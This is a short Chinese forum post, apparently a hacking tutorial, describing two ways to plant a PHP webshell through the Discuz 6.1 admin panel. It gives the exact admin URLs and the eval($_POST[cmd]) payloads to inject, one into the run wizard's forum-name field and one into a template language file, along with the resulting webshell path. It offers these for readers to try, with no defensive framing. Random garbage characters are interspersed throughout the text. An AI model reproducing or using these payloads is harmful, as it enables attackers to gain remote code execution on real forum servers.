discuz6.1两种方法后台拿shell
! U6 ^8 E3 x, u+ u+ q7 ^6 {好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
( }0 \; ~2 s* X" l8 P! H! `% r5 J% f1:) d0 J' T. Z; {7 Y' J; L
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
/ V+ I/ G1 d) ?. R, iadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell) L! b3 _0 v( J/ w8 ]; h; q
<?php eval($_POST[cmd]);?>
7 o" i' u8 H/ x3 g' n! I/ ^( h后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php% w3 S) K1 D! }* L( N
& i" E/ h7 J2 A$ K$ n% {5 z
$ ^: w! B, m* @- y0 a% C2 E) o2:后台模板管理--默认模板套系--详情
$ y- f4 _7 C4 g2 m ctemplates/default/actions.lang.php/ A, N+ Y5 u# v) \7 w; E$ S7 r5 ^
jhackj\\');eval($_POST[cmd])?>;//
/ f9 q3 ~1 m, p( _7 Q# A1 E( A
利用很简单,聪明的人一看就懂了 |